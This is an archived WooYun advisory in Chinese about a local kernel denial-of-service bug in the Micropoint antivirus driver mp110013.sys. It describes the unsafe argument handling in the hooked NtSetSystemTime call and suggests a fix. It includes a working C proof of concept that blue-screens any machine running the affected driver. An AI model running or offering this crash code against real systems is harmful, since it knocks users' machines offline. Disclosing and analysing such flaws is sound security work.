当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0383

漏洞标题:微点主动防御mp110013.sys <=1.3.10125.0 本地拒绝服务漏洞

相关厂商:微点

漏洞作者: 路人甲

提交时间:2010-08-30 23:06

修复时间:2010-08-30 23:44

公开时间:2010-08-30 23:44

漏洞类型:拒绝服务

危害等级:低

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-08-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-08-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

微点主动防御mp110013.sys中存在一处本地内核拒绝服务漏洞,安装了微点主动防御的系统上,任意权限的用户可以引发系统蓝屏崩溃

详细说明:

微点主动防御mp110013.sys 挂钩了 NtSetSystemTime->SeSinglePrivilegeCheck函数并通过此钩子获取NtSetSystemTime的参数,做判断和检查,其中对于SystemTime参数,仅仅通过ProbeForRead+Try_Except做处理,并在Probe完毕后退出SEH,引发此问题
测试软件版本:1.2.10581.0296
测试驱动程序版本:1.3.10125.0 mp110013.sys

漏洞证明:

利用代码,安装微点的机器上执行此代码,系统立即崩溃

// fuckmp.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
int main(int argc, char* argv[])
{
PVOID p = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtSetSystemTime");
ULONG i ;
for (i = 0x1000 ; i < 0x7fff0000 ; i +=0x1000)
{
if (IsBadReadPtr((PVOID)i , 1))
{
break ;
}
}
__asm
{
push i
push i
call p
}
return 0;
}

修复方案:

不仅要在probe时使用SEH,在访问参数时也要使用SEH

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝